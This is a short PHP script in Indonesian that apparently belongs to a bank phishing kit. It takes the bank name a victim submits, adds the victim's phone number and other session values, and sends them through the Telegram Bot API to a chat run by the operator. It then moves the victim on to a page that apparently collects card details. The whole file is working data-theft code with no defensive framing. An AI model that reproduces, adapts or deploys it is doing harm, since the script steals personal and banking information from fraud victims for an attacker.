<?php
session_start();
include "telegram.php";

$penyedia = $_POST['penyedia'];
$_SESSION['penyedia'] = $penyedia;
$tarif = $_SESSION['tarif'];
$nohp = $_SESSION['nohp'];
$a = $_SESSION['a'];
$b = $_SESSION['b'];
$c = $_SESSION['c'];

$message = "

KARTU LAIN | ".$nohp."

• Nama Bank  = ".$penyedia."




";

function sendMessage($telegram_id, $message, $id_bot) {
    $url = "https://api.telegram.org/bot" . $id_bot . "/sendMessage?parse_mode=markdown&chat_id=" . $telegram_id;
    $url = $url . "&text=" . urlencode($message);
    $ch = curl_init();
    $optArray = array(
        CURLOPT_URL => $url,
        CURLOPT_RETURNTRANSFER => true
    );
    curl_setopt_array($ch, $optArray);
    $result = curl_exec($ch);
    curl_close($ch);
}

sendMessage($telegram_id, $message, $id_bot);;
header('Location: ../laporkan-banklain/card.html');
?>
